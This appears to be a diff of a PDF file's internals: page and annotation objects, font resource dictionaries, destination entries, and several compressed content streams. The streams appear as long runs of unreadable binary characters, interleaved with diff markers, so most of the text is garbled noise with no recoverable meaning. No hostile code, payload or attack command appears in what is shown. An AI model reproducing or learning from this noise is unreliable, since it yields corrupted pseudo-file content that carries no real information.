ð]o×;Úo»zËO8òEõ—É;R,WuC€®ð➈4F·ÃZ Æ4;Þ+:+x,¸^u¦y@2 µ<_EÀÂ]¹±~"2ÿ¡°îÐV7­!Ðr†@o(\ô–˜üFd‡PØXge£;Ãç>­šzCPÑ1#)ñ¦ë¦ÙèžcsÕí)Á˜n9º‘b¶aË|¶vDÄDåV•¼÷°6 c]-{û1ÎÂÞ3` Æìˆ 4"Q¶r¿­¬7ê2èÙ„ïÜ¢eÙ ~³¡š³š.Ú©Cˆ$aìƒÂu2?ÿøù¿˜úýãoGòiX‰b¢sW"ö;'|6pX\äškYâ¼XíiG³,ðN{%?c«»5A×'D’xÏgCOƒXÉc7hû$ûŒºÑ`½†£èÀ˜k­Û#‚?ÕeY#Ét=ºmuÓìònטÙQ¡úÒL¼¸O”PY8…¡ È*bîz½žm63Ìd±Œýwï&¯À _Mþø㦗EBvèsÝÜšŽÁÄ7×oý:p{ ŽÞÝ\¿×Þˆüöæúdü=ž*ó +b¸õF®U€}ŒÉ%Ý­{]îÌÍ)ËôÂÅAä sš‹•¿¡øòmCÐ +ªhµ,÷´:Xô–ØE)€TÂà¨cÈ;#AIšêÙ=¦Œ€†©¿PâÁŽ÷#§˜s’°?ã‚ñ¸PIè‚¢>8Àbá£L§_.Tìe‡€zêßI©äiÀ"ûo8`¡`Ÿ +Ö0 RÑG9ùX%ÐgDÑq(Pe:ö}aÓ{=c……Ê:~íB„¯¶19ý¯Q€üàú!ùVËà™&m:hÒ"nÒ^—»vM=X‹ví[6ö4ðwn¸Æ+|sŒϽ÷•Ø9jY“$,´uUJ(ÔKôm8]éMQº¡#›û,Dº ¯«Ül;¶­Œ¤¬*‡EA²)Rµ^o‹žL´–¦Í›bÛõw4Õ°úQHEORƒˆ·5#âÿ’Y¬ çïªÆÈz8Uƒ»µJrØáàºÀtl ‹ ”Í‹å¶}e_1å'LGÖIð®µéØ"’'ÊH$‚4‘ßfäi¨CÄX&|Œš'ävÿœ¬.Ó@åÇ|Z”qHƱxØšçx¼v 49a aâ:Òé†;U]íYÈ„_l¶¥Ù°®0îd&!ž©7D„¾™°Ø!P—‡ò€É/“†Î¹#u,¬naëXF¤Á/ÛfhÙÉ‚º;ȌԘÍÀ·‘†ÃÞ{qAvü3ŒÃþDð•3œâôpÑvņ3Ìa°àÙŒš¨-÷£³×÷ÎjοåÎjo¹{t™ø‘®‡ùf¥|W‚Tœt+Χ횎S0}!©¸tMÒeÜ~Ž0¬~8èç~US?Êùn¤%ZZšC ÿŽZKËV­à(¤+} TÕ7ÜÕã6ó<exLCÙI§þc±û9uðp?2 Åï]”…SóՇߜ†ûÊâÚ(ØR±l›J6òÅgɪ½ÕEÕvΈôÎ% .½½¹k³ç¶OÎ{KÕU¹wãßaôpc„ÑÕx¡Y/VìúxõTŠïÖþ‡;Ê}·vmb /SRÙîig¼£ïë®ÛÎ&‘A ')´P àÂGL( Mj«’ ¨â´¨Ÿ5 HÛõöçbùBêLoÁ_t6r»”óÂuÇÝqtÔL‡â†(\¿ý?}}ÉKë,tþ÷Ø þpõêå»+î‰±í ­÷í¬L—ÛôÎ/UäÜSüódØå{B=數n±ŒÚ}E{w®i]<|;ßü YÎh¨SDÄô¿|ûÿþ.*C¥|¦#Ä$Áœ yÆPxáœöÃp&²¢~bû~>,Âð1ÏÀÕ‹¯üêÓÉä´Z®E8“é,Ž¾N·.5Xïƒif•µå ²É/*Þ¶Má.–…›Ö”ÿÑ@R8\ d3KräÐç}tëå©z0dz»-‹Û{Ì(ìk&_W5Ì"{æ÷ý/ï €ò$?ç[;§”°Ÿòò§‘6£Û_Ž/ +@ƒJù?>ÑÕcE©ç¥¾¬¨zùãI»˜Ÿý~ôm endstream endobj -860 0 obj << +854 0 obj << /Type /Page -/Contents 861 0 R -/Resources 859 0 R +/Contents 855 0 R +/Resources 853 0 R /MediaBox [0 0 595.276 841.89] -/Parent 863 0 R +/Parent 852 0 R >> endobj -862 0 obj << -/D [860 0 R /XYZ 72 793.935 null] +856 0 obj << +/D [854 0 R /XYZ 71 806.89 null] +>> endobj +394 0 obj << +/D [854 0 R /XYZ 72 737.136 null] +>> endobj +398 0 obj << +/D [854 0 R /XYZ 72 493.31 null] +>> endobj +402 0 obj << +/D [854 0 R /XYZ 72 387.451 null] +>> endobj +853 0 obj << +/Font << /F21 503 0 R /F15 499 0 R /F22 546 0 R /F27 638 0 R /F26 632 0 R >> +/ProcSet [ /PDF /Text ] >> endobj 859 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -867 0 obj << -/Length 1959 +/Length 1820 /Filter /FlateDecode >> stream -xÚ¥XykÛJÿߟB”±¡’uË2”G´¤4é‘„>HKYËk[}²¤®VvòíßÌÎJò¡íƒv¥ÙÙ9~sÙ6–†m¼ü8ð´ Lj\#Šmˉc#Yn¾ÛÆÞ¿7lË'ÆVQ­ ?œÀ33.Ÿ¯®ã·®cÄVº¡qµ ž{q57n†52'±?¼®Ø’¾_½¿u‚z?˜X¶ u8A’­E{ì w‡Æx…>ò2}ϳÏÃ…åû1ñükdn0,ïäªÈi]œá¯lÍJ«¼£7fMÏg+)ËéxìD®å„–ëC öœq¥Œ×,ÆiZ—\þ¨¤p-V•çlÍ_d@YËψÙ7ÇóQP×w\Ãt\0¤GR™¦àln.ÒŒë›_O½3ä·l]fÜâ·\32Í:O‹Ü¬+MlnðéÅÞÔü]ߊ'!ñ¿±,ë»újï_|³ZM×ë©'V7goáÒz âÓbÆ’MžÏi÷æÕù%­R ®hyž&¢¨Š…¤íåçzÁņ‹¾Ë·|¦=@$J‰¢ä‚É4_êOw•äë)m¾¦ù¼ØVDèÚ¶ý WV–Yš/r´?”­ggZÍвŸ·Gö.õéÒcûLéÎG¬¢Ö.\jÛAÃwÏqø‡W©Ò|Æ –tšÿäIc‚`ØíÑ닳}·¿l²Ëåé‡Ó×W¤æœç]úÙYš¦NÂoˆô¤úùqñþä…~îeÐè÷3h%!7΃T&R®ýZÕeYùpEè?’pÿtÝ_½´Õâ‚t(ƽYþ¤[p™¬ºì ]Š. '¯§cÕ (@cò¿”o«#*¤c§Å“ʼQVpY‹\+ëuq‚è¹»‘Ä#Sv}VÅ6 _Y´Ø¯Š5§ù¯à­ñ^Ô²¬e …Ä™UãÞ«üعú!tÞg™·høFÀ9“:B ³äº*Ê¢ò­ìüS5!=o?ƼW¯>ù÷cÿ¤¯?Ñít¦ï3u:0Öž¥:«€@Ê'=W›bk -ÄØi²ŠÞ”Ÿní¡­W¶›ÀøüÜ|ó†^)ëØè‘ =y$Ú®\=úv*Tª{‚²GšêÝ#} tØ}:õ\ | ½åI½ÛWÚãM¾×5c…yw}ÖUñ³\r]}&¶7 u\¹æ,•4¡íMtÊvd˜žk¹A;ÖŦãøñðë(†M%HãM<¬ÚøÈ¥ž;L°Ðáþ›íù™&Á‡O•¼‰¯€>cØ é8Œà8”êø<=Ó$ú.° ¤IÊ%&ÓjªµrwçNÇ -‚°™;Ms‹ -À8:a¡>fÂD5ôX…y:±å…QÇs•†&¼cv€ˆÐŠü¦3±¢Hƒí Ú "Õ\ೄÇdXTUªœ¯0úÝ`2¬¡±`szÇè&rerÜ7&ëŽEdr\h“sâ¦ì g1wÕÖVtÛÏÁ „'õ0„D»¬£ášå0ú«6=¹p° Ï -]í©öŽ0$åC@zŠ³4½;¿ƒJñœÖŸFÊ&r)¸*H[4tÝð…Ûöû¥Ò/RÑ#ÐÇÈ+Š•#©G*ÖF€ânAßW¬¢W-aÎyS¤p[Št®^îÔ¤ýÐü¾ÝâLÍð¸ì¬ä;P–ÐÕ _’¢é"YÔ¹êì c“ªÚ+(2aB~ÀM @¢×ñûVù‘ý›ƒ"¼²Ff8‰†W+}kãX\W/}'ŸÓÛ{W\Ìè+mg( z5TÕÈó<å ÏóU"€í,Í–v\Óí “ï«éÊÑnSüó$£Í -TT¡'R͔ղXCoàÎîF¬Vˆø5+uGB²ŽšP1‡@6aBœsÉÀYsÚ¥¹>²ÒŸ·+Êf°,™6’ÐÿLáeb©ÿ1ûòn`Ü(º—ˆ®ùf„à ¤á¬ðGW´M: -‚pÀ×…f®¦:‰¸TÓÔ’¨š @Jšq3*&E‘íýY¦qûírªË/ù'×&íIö¡uªM‹*ê(å–m…QO"‹Ë™´'šQ ù“’>f*PJ%«{`qýé3)Ö¥@ÈÎw¡2}Òÿ‡ÿ:Ì( -¨tùÞ=…|,ñrœ'Xh­’ÚëžÖ¨ô_=;Uùá’ìï–dúÀU‘ñž²ì÷—å'6bÇÂöõ ÐmÝ -Oê¶<'òý®Ý³™ýíVÿíG;½üø¤ÿ˜ +xÚµXKÛ6¾ûWèVˆIÔ³·¤IŠ Åz[I´LÛBôðŠÒnüï;ÃÊò®“níŇCræ›8;'p~_Ü.BøNèd‘“…S6‹Ï_gü÷NàÇEîܩƉӾµs½øcñzµxù. +Â/Ò(uV[Ò!üB$Îjã|véåEìÞh¹S˯«÷/ß…ÉL>Nr?ˆA¡‘Š,>šãñ´ ?Ž z¥—žÈ÷¸Œ2·iPÊ–­Ô  ŠÂÕ·u#Äýˆ¸×R­—¡[Žµ”&Ö°W$X«v7ì‰î¶&oGÕ‰×ÃaÌN9 +´ÄV T†îPÕ\Ø`¨u®^ö}u·L€¨_àõáê^(ü4Êé¾zß-£Ü½GM"fMB¸‡¾ÛõJkU-s—«¾„#1 ÙÍ„l7¤ ìFšâ•“ :68·f-4aN +ß^ }¥îP@±2²M—8±—½,ÕkŸ¼}†¸™ˆü,Œ-8ÂÄOÀ\a\¸7èªÈÝ€ÍÐ.1úÏØðp6 (Jü(`H\ßWíþ+ïÍ„EêGñ„1Ïf“ÇZ=–ôÂÜϲ”äotÕî–^ é+øî0T]KÜ#nŒ8ÄÁ!JŒèˆŒ¯ƒ cf£¥3ÆíêÓ”³ Âr‚ÍmØèuwhد4q‡.cO‡ÙT½*‡úH£mß5¬µÙèq:H'-žãŽÚ+ÂR§«¡ÜçÂ…`ŽãØý{™ÇyˆÒUu£Æm ÁC¸WS‡V1HdYfýiÙ¥¯¶&ž2wÛ!ðrÄ,.?z%uב”]ìÎ"^’K·•U­­dÏë#{¢$}iL9B:x š(Iý¤H-jô¨N"ôëÀòa8É“åq†G?š“ÈÌôß ¾QÂ]€eM Û»Wƒ±”'BŒ›èÜC÷U a:E=X®!E5ê;Ä#‘Z6Ì|d4ämYj +¦Kf »§Sú¹V‘# +÷ +€m¶ÉNaƒ{ÊžÖmKöÀ“Xcáéø”Uí¦CT܇Ź"Œ?c°(‰ü@dçµIu¹Íy¹»B[Ë~è*­®ÿüH̲®¦(Ãñš¼táöÕno¦<2fbÿåàÜžÑæìÜ}ûýPw=¥ÓÂÅÒ@qÑÑô "0ª)?`•2ãÉ +@ŸCt•  QCQ˜æ»íAhßüÈi"ôE–œœö8…{,B‰\ÌyʉüZ.!ß-Eè* +cÊ–šÆHhtú”]‹Åy7žâÒÆÇ+ŠœªÕs-ïžœþ¯Yäšt_›uµ®±Œá«å)«òÌž‰²k*À0¨«–Ù'ÃÌÔH»ä¡a€I†‚ ƒI" Ý•Ýf§Z iµ™ ±:ÙNgbjm*”º”ûÕ¦lçÆZ ©µ­û]1§° Ö´XnÔW„iêÐ`Z_”üɲIÄ–ZsnYÄ“+òa$ÝĤ2ÿEä†yŠó =HÆÐ}…È5Ù°gÚv­4Ì@ƒ\ +ÍÐ í¦£®åÙ1º–C¹2H1§ÆÑ,Æ!æŠÌ•SŽ¾E·Ø®Ê¬0~„/ä]’1&Ž …0ÄcP-˜ÄM7&—w¦ÿÃ%­Í“0€TÛÿ¢IIÅ]lÜã $¶ßìU½'D5¡ õêv„f†S ¼ãìŠÑ”í ª`‰þI@¢ˆZÛ$ ôhzºÇNÈÁ¶IôïNˆ?(¦Úv*˜Xå h¯¨9¸BU«óì,ÓááÁxé$$wÀÔ®³ëMH%I`£¶r¬§+™"¾—¶ëy”;Æž–±7Le £Ôqrn²ªÚxƒ›Î4Z´p˜ñvö-`ܳ±‘;aè XûüØ/òéšâíÓ‡J—ª®e« _¼üB˜Ç ®ôCŽÎÕ§7x¢OÏjJžip†O?y؈ٱ£ÿùØå^•ß¼ƒDåǺ“›gºC<»ƒà;üð5)päÞ•ß³Â}óúÃ5Q¶å¤éY§Ê +«QIÌ›7ï¾I á'œ:}€ƒABm= <·Ýð.ãá?5"¡¾ð¾‚b®Ú UŸ„Kaâ½D+‰Ä¶™ ¤Qj=EÅ4Ň¡\KÍóÐàC³¢\Il}Ôƒjˆfó"wª¹°ƒj¸#é¥yè ï‘ù&H*édKxTQ¡“$¼B?QiíØšL=wÖNÙÁì_Pó›®ejܬÝÍ^¼#Ió‹•’]|Ó¤…úŸ$ |‘Oõ“;ö%úó'á^s˜:1Cböo ÎüŸ™injܰÚ0 Ðì½â7ÿüïnGý³Ïì÷íjñ:Ï endstream endobj -866 0 obj << +858 0 obj << /Type /Page -/Contents 867 0 R -/Resources 865 0 R +/Contents 859 0 R +/Resources 857 0 R /MediaBox [0 0 595.276 841.89] -/Parent 863 0 R -/Annots [ 864 0 R ] +/Parent 852 0 R +>> endobj +860 0 obj << +/D [858 0 R /XYZ 71 806.89 null] +>> endobj +406 0 obj << +/D [858 0 R /XYZ 72 720.983 null] +>> endobj +410 0 obj << +/D [858 0 R /XYZ 72 570.716 null] +>> endobj +414 0 obj << +/D [858 0 R /XYZ 72 480.666 null] +>> endobj +418 0 obj << +/D [858 0 R /XYZ 72 376.709 null] +>> endobj +422 0 obj << +/D [858 0 R /XYZ 72 351.166 null] +>> endobj +426 0 obj << +/D [858 0 R /XYZ 72 274.467 null] +>> endobj +430 0 obj << +/D [858 0 R /XYZ 72 197.768 null] +>> endobj +857 0 obj << +/Font << /F21 503 0 R /F15 499 0 R /F22 546 0 R /F24 614 0 R >> +/ProcSet [ /PDF /Text ] +>> endobj +869 0 obj << +/Length 1448 +/Filter /FlateDecode +>> +stream +xÚµWKsÚH¾ó+tUA½¥ì Ç/²Ží®T*ÉA†f£IvØ_¿ÝÓ- Ž³©ÊÅênzz¾~…µ´„uÖ»ë¹ð–kÅž§ÂqÓÔš½Ï_…5ù;K8AšXF«°‚(onMzzGÓÞëSϵR'¼Èš.Ȇï¤~hMçÖg;rúƒ$ ì 5“e-û?ñí¬œ#سªïÚë¾ïÚ­€\®ú¾g7ý¯Ów¯OÝpÇn&Žàbc5¨Òì V¾) 7r‚þÀuƒÔž^e_¸HX/t<‘бɃjf}/±WoHÙóv”ýÈñ‚-ªÁ`Qé¢>`tÀŠ7qâ8&uÁöÐßsb×ßÁ2îŠ``ŸUðõl ß2gÙ¼Òß(¾ZÖmÞÔÄ,tUU¯Í!9S_„È9I×Ù’ÓRbðÛÿÞ’¦þI€Òß ÐÒÜöR€"R?–‹ ü(ql×wy‘­‰tp¡\exェ4Š¬H¡Z7ª*àq#¸Gx[@ËXÜÀñܨSQ5™l*úÎ+º,# *Êâ”™¦xOµDkr'›«btÍþ¹BAÉSå’Ø›ñEMç ¸-Æ:ÒM€ðÈã<,Z †9“D¨ò93± «e–¡'CàÎ+Äù€ä½ù«_a%¤pŒôgP: ¿Ueöh¤ 3z¢ÜÐu£s ëŒ•z?ØéýèϬu¦k9ÀÊTúOŒ¯ø×]ø­©¢å:W³¬Aã¿<]vð ìy?ˆ< +†G£‹Ñô+iR:M/O&ž¢©«11CR¸6GÇ}x–LGoo.†c–ߌ¯¯&')O$Ãäj~šö³ËššÛbF¦+f¤û¦ìÂÀiQižÐsÙd*¯­õöÒÖí=È„tƒžàæB½ÇA'ŠÖ”¡*SUNl'nKu×Ê|³gmÃZ§Z¯ÊZÝâ†Ë¡ZLÏ@°ãÜÄ-¶G“- A¢¬–´PZýkz¯ƒßu[vOÏ”j.–1¹ ÕK)›íS€^‘žxŒ2­G×”²›ÚYÓdæ®o(DwJ$–ôëcÕ›£iã Šê êvûXBÕî­tÑMb—²ÙÂJ¶°+7º‚ª`l¤¦3KŸ¼b¦ÖQÀÐ #K¨Ÿ™, £Ì­êÞ åLÉúåq”ð8šL=7 :žŽ¤.3=ç'ÆqVÈœ‹zèpW8O‡7vÁ +UÞµªÊ%Íw‹Ìæ]_Ücva›Àhc¡}}vMJË £ã7ÏÏsTßEx}qº‡è€¾Ø_Âï•®jJÃ=Ý5i²ž$ÏyVÓÏžÿ°RŒ;AçNð¿Ü9 +ý4>rž¸³ÿ=™öþf¯ÍZ +endstream +endobj +868 0 obj << +/Type /Page +/Contents 869 0 R +/Resources 867 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 852 0 R +/Annots [ 861 0 R 862 0 R 863 0 R 864 0 R 865 0 R 866 0 R ] +>> endobj +861 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [249.598 376.975 363.353 387.766] +/Subtype/Link/A<> +>> endobj +862 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [493.823 376.975 540.996 387.766] +/Subtype/Link/A<> +>> endobj +863 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [71.004 151.022 176.596 162.974] +/Subtype/Link/A<> >> endobj 864 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] -/Rect [286.536 174.39 534.93 185.181] -/Subtype/Link/A<> ->> endobj -868 0 obj << -/D [866 0 R /XYZ 72 793.935 null] ->> endobj -290 0 obj << -/D [866 0 R /XYZ 72 297.755 null] ->> endobj -865 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -871 0 obj << -/Length 1581 -/Filter /FlateDecode ->> -stream -xÚÍXmoÛ6þî_!"-JÔ›®èë–¢mR$C1¤Á H´-Ìz©(Çñ~ýîHʶ9βvÝ'JÔñîáÃãÝÙÆÔ°__FÛ FàAdEF’®®m#…ùw†MXKi•ÌaœƒOƒ——ƒÑ[‡‰|Ç7.'ʇK"×3.SãÊôÈÐ -#fþ&â)^_¾½¥Þ–=óBb3p(­ýM¶†¾}#[Ÿ¡­Å\—P×ÅÂX¤Öü4´<Ç3«U3+ õ,†Ôü:ÏãŠT+5c-Ôx4kšj<ÑÀ!Ô'‡`ìÒ‘ Fù -FSÞü‘ ‰Eu÷gEZ.…2tlÛUÓe­F˜ ŒWÕÇ’†‚M:’m\Bǧ,±Ã“Eƒb'„½Ô7ø ©ãz¥fÊݘ jÖ1á{‚·)Ï‘ãû:g'îY…·BŒ5Bgû/("o­¤,«V’§½¿“õÜÖp¶ãŒFÄõƒŽ31ãóyŸþ£¶OìÄè®z -Öñ™Žç›À‚´Ù ž'~B¡†ŸxKN"}š;|M ‡9R¨ ¼rñŒ«Õ ˜ Ð ±­aîRù y–æ*îš{\!ÐHóïËßuzƒ&1j¦¡˜ú¶ã‡4nâ›Xðuf»ÄwôÙÊxÊspQd†áÖ9+*pŽg§Vsòȉš?J†¶Äo(ñH;ü#£~Çà´þ˜¼¾Eˆ¼'̦ê¦â¹ ZVR|Yˆ6²,8…†=»)8Oyª¤2tÄ[¸†Sl¼‰ ‚þfD ­ó×äÈ7¡©O2TÚ‰šœ,Š38žgMÖºS˜ñ¡NƒY†jgQc Àé¥Üaüg;á‚ô*ö7—ƒ¿üžÄš -endstream -endobj -870 0 obj << -/Type /Page -/Contents 871 0 R -/Resources 869 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 863 0 R ->> endobj -872 0 obj << -/D [870 0 R /XYZ 72 793.935 null] ->> endobj -294 0 obj << -/D [870 0 R /XYZ 72 190.982 null] ->> endobj -298 0 obj << -/D [870 0 R /XYZ 72 163.17 null] ->> endobj -869 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F24 512 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -876 0 obj << -/Length 2059 -/Filter /FlateDecode ->> -stream -xÚµXkoÛ6þž_!/ˆÝ/†¢EÛ¡ÃÚuKŠaÈŠB–h[‹,)$Çÿþ=‡‡²e[MÛ4ûbñrxøðÜøÐŽµ°ë—“Û¾ŽåZ±gÅ©ÃÜ4µòÕÉõ'Ç*`üWËaAšXk-µ²‚(oe]žüqòòêäüçZ)K#/²®æ¤Ãg©ZW…um‡l2MÒÀþ(³Ÿ|ºúõüäƒ0aN -µtì È‰c YS3= |) ý^O¦~êÛï6—üFͬ.¨ñaâ%v#ÕBp˜<£Ay[­²۞ݵU“’&þqBç®Ì¨£–¼õƒÊ´Iœ–Î;Øصó‰k«²©³ªT/¶74ËïÛ*+kn€d³É¡ ž;üá°™kæ ¬e&@ ‡º>‹¼„NX•3‘ Pì…©9+ëAá‘6/L켩†‚ÍËzAcØZÛ‚u’‹iÁq­†ˆBs îÛÏùJ.9xà8v¦½ðž)¤j„ÎZß·[Ñhƒæ¼è¿€]Îi²Th1ßÐ2Ù¬âèœØÖh >å5NÊ~ÑO¦1§µ¡Ø/h§^ F ~_Ju¤8ÐÁ(ÐÁÛCusѬ̢\dŠ|ʶ®OXGtÞ·s*X¦Þy:¨¥s £r"TC_Á•(9U²ƒõ&&©³ ìQh`´:ñ^^—˜#fw#[÷C€Ü°m·âp°²©ih$°Ëú_ž“Tà:¶âd‰º¼íÐd8¦ jUêt….†,~K½Ë àSmÕË1K]0<ï‹$š±fêõè¬LQ‘È©4àÔœ¾` çF›Ñì«Ë0ïÝ»¡Që_~P¢ “Â%9¡Ó™cšÆæ:ÆLÑÁŽV¼4/õµl:Õ¶êÝ0Ø¥(Ù¨åvDGŠßߣÐÀ¸À+]AÆ=òï{6ÜŠ4Yp¸Ô*ÊMW›U/Yšéõ²T¦Ùf¦ -ÃΈ…á5“¸Ör/tq7 #8@Þk&¡·Ø¡ÅrtD ØÃÛJñ‰Ì;²­K×1T+ÑTû\æZ/OIcãÒÚ¯‘²œU|h]s3@ìåå|C#™I{ÀUy±÷ËÌb©X—}€-w>a© —§ß×Úé´‘Ó|UŒ²:æ†[Á¦E›2sû‹£È &‰×÷ÙªíÑ“ù‘&„!½Œ€¦[¾ðaݲ=X•øvÂ|Ž@bÛ•* ®.ö<ô¥/@ˆ¬E¾E\/eð[ð‹Ÿþo2 ½Ðn!#?¶%U§k742íèûl©T{q~îÆs#æAƺ ì»ç”¯çíç€ðsY+–ÉöþyYüì>ÃåýëÚ˜) \Qü§ÐFëe“­Ð»Ï ‚;úºä £À Xš˜X¼fŒ}Úé@óõry±Z]8á'RqýöýPü»éê´ÄÆ,Ëoà4^½|wI-D!©ùa糑Ö|f Ô¯&÷ô”ν êüµ¼YKôǧáFÐF’½}‚ƒ}²¶­ÊÜÜ-¨ªÒ²nªf±1;¼¸üÀÞ¿¾:£ž¦2xÍfpäí[sȈ9g{K (æ°Ð‰½xì¼Ç» UÇfÚsÔWüÁåÀ\pñÜp³TZ¸ÅŒ¹d׶0Çè#·ÍD¶âŠž" -NPÁ± ö0ÆC#°Á˲ì7'&£#FÉ~]]Óùý qá…q¥®g(r¿à_ŽcLù°ÑÁÎDÖÇL}hçà›°ÍÁÄ\´ªÅÖØû Â#99šU°Í¡‘݇tD, hµQ¼,r¿<À0c®ã7ï„àµ"ÿSîöêå‹GìôæÊ—<¿9‚Û¿Ê ïÇWoL¤Vð.Ì-¤_O€Úy(P“ïF ïþB<õ¾Ïùjü7au[‡=Ú`P·v‘lþ¶Ù—Jû4ŒÅž>JQpÓ¦²ž¯©¡ÖÙì›ô`'Í:±²Ûúgž‚:{õSð¹9ÛßçõC$ÃÿÆ:³önü‚ß!!jé²Mü-À­{È@£ç:Ž}Š:qr_íéØÿ x;1|ÊúéQÙÁß#Èb·tVÿ=,W?Ñ¡d&ÄV€3øÕÛ`_“ax_Âï É:#˜=à›ðy -ì…p|8ÒWyð-à|^IäÁe)5–JxH†Ÿ×peþ\dÁ' µeÅÁ·±âiWÃ%>ÕÿE< M“§Éƒ˜À®Ž Ý ^üÄÔˆ2lí8΃Šÿ+®ü]Äø+†1¬Oî1çøÛ\´ÇêÙ®rÜV;íþ*xˆ9c¤‚ð©)W¥ZRëýÇß æ™€wø¼9n9–†¯¯NþAÇÃ- -endstream -endobj -875 0 obj << -/Type /Page -/Contents 876 0 R -/Resources 874 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 863 0 R -/Annots [ 873 0 R ] ->> endobj -873 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [286.536 628.228 534.93 639.018] -/Subtype/Link/A<> ->> endobj -877 0 obj << -/D [875 0 R /XYZ 72 793.935 null] ->> endobj -874 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F22 421 0 R /F26 513 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -880 0 obj << -/Length 1781 -/Filter /FlateDecode ->> -stream -xÚµXmoâ8þίˆN'¤%ä=©·K[ºÇŠÒÝBwuêV«@Lñ5oMZþýcç…Ò»[©²c=ÏŒg‘„A>¶žZ2´’ ¦"˜–$Ê–%,½Öݽ$80þIDÍê Ï©”'hFZW˜µ¾´Îæ­Þ¥" –hŠ!ÌWlU´T]˜;Â][;ݾ¥µocûuîçŸz—²^’×ô¾(i°a*mÊT¤%qh°·!ôAÖШlWSUQVUÚ5ÍbkZ®}ü”¤»Ã²®¬^•MÞ­×ÏèýûNWWôöÝxzÙ‘Û×üsø+yØ`ß«ÄuYû Ûwh_kÇOùà¿hIpà³Ï¬ íÈölKPÄFN|8y oÃX9O?ò²F¼cGˆ°~e@8f]?à“öj°Ã¾[>ê3ôè%tLì…‹©Ã¦rì¬\±z“¸>56²ØÅdû Ü$Øæ ¾KºÓ)¹!F>‰¶0.×À~*9¦éxvÏ„k'w^"ßᵶÍ=g»1ÊMpp¡Ë^ñýµâü*z7¶{TŒ¾1GØz%§Ö:½ÖãZæñ2x¯Ï EISˆ€;0G›ø°lÐé*’eµOÖ„„ƒ^O6Q6DE¦)/î¨òì°çÅÐéa÷À?b)¢‡ïé©žº É5ŠNØηÓñõ´Nûp2a³Ñdt>g˜§·“É;6\év»¬?œ^0Ñ“YàO6'§¼ÍT(šhõ·+ŠIž1±—Ùá•Eñs“0 "ÒÑ4ô_!I}%ºžÑ"}/íâ(9„¸* £0§ÜQèÊNÂ+žzIA|2pIœ)ÁÆÅÙ°.P_Ñ´\£å㞪—ðÇÒsâ5bŒIÉ”/dæ‡Q°DN¡J.nlìR¾åôlc"ŠMæ[õ *êõ}õ ¼@/Ô)u&´ ’ ŸO//îr>!G»A•0YžgÓƒvòpð;â_AB„¼çÆüÓóﬖåWBröeR„Ù6·yC©>wàL"ŸÛ-ìEòFwŠ¿žnWÆ?¨[بö³;8!ë ®û.«Zz?’ç zäzP´ÁKT–|ÛJU”‰dBÛMµÏDÇ J†¤‡L[¸ŒÚë·Chúí ŽqzÉÓI°6Æ^æ×&|Æfk"D¹?añE»Ï@\lK—Ñ¡Kz‘¤ÛÒÑ-Ó‡ØF6‡nM'¹–hIdGü“»=C×èxÆñŠE¨ñÚóuá+U4^é!#%DpÌܦ(åbR%IÍŠÉn7ˆ»Ì¸}ëºhÈr&šFÝvM¡©*¿ÅéHL«…´7ïôÕöðŒ}€A¡‹ -<Å8&5›î²J|¸!®;’R%wéØcG1Û¨Æ ŠpÉ(Ù^jH§ ×w1¦¨+¹1Œiºš¦A)ßB ™üR½Ø7ƒšcçÊu¼¶ed[^mÓ\TÁº(‰†YÂÔE¹Ÿ¯`ÅÊ`§œ?ÔVË|Ý4uˆ~S4$ž(òüßBžùå’j1äìÐåŒöÇ~²PGäEÄ–´€À>¡õÃË{ìœÊ0§9œ:Ñ5Y©ò@UL冭Q˜×ùŠB@Å&T‚åå.àÆí¢Œ´.ήf{ov@5:òkrPV¢!”f¥êcä ØÇ7ì;Á3¿ÉH'ÎŒü–…‘~£ž¢|(Êô‰¸ÁÖ+Î>‹ÓÑœßWxI98ˆƒgÓñ˜›hˆÒ»%¡.™ŠYG©ûî°U<Šéè_§¬¥Ñ,5ToÏæ×VoØ99"@ØdYÀ¨(ÅQç•Ux@‰½°³ãàia? e±ãs;B¼/s³Ê×7û•V\¿Ÿ3öJäѼõ¬oE -endstream -endobj -879 0 obj << -/Type /Page -/Contents 880 0 R -/Resources 878 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 863 0 R ->> endobj -881 0 obj << -/D [879 0 R /XYZ 72 793.935 null] ->> endobj -878 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -884 0 obj << -/Length 1323 -/Filter /FlateDecode ->> -stream -xÚíYmoâ8þίȷ¥MÄ ¤R?P]VºîNêVUH äšš„–þûÄÎÛ- t®RÛ™ŒÏ¥:$^•dN·¸ûªÌŸ7T\‡ÆŒœ=èß.:‚\ÇrƒG&Òu1©  t+\dËžcIâIŠ<Æ*ýæ~>¿tÝK,>œË¢\½ïö;gBuÀº #ۛю=¥OsÄ‹â®.C°×!}¶¯›1Àp.ˆ°xiËLmífß°þó’o—´=ÒzZK§íHF­æH£ÓýùUëçãñQ6\.Hð¸ì*Ýné÷-|vø,èj´^mBœh_ôa·óØí·µ¿0c€=j}ýq<Ò† ‡P£ÚZ_›É‚ ƒBÜŽÿ)¬^÷¶Ë£¢ÄUúqC-~ Wu¶j\eZoÄÐ#6Ðo'⻾ìâ€DM^ˆÅlÿ®i‹óÀìS?p‰E»rîR›„¹í•‡Äô=+Üi²2`sŅ5R†oá#Y“N6nwè°áÄ°Þh‡¬ì0ÚgyÇà¦g¸„¶RVbÆÊéÒ3×X‹—Y‰)Ö”#‚ 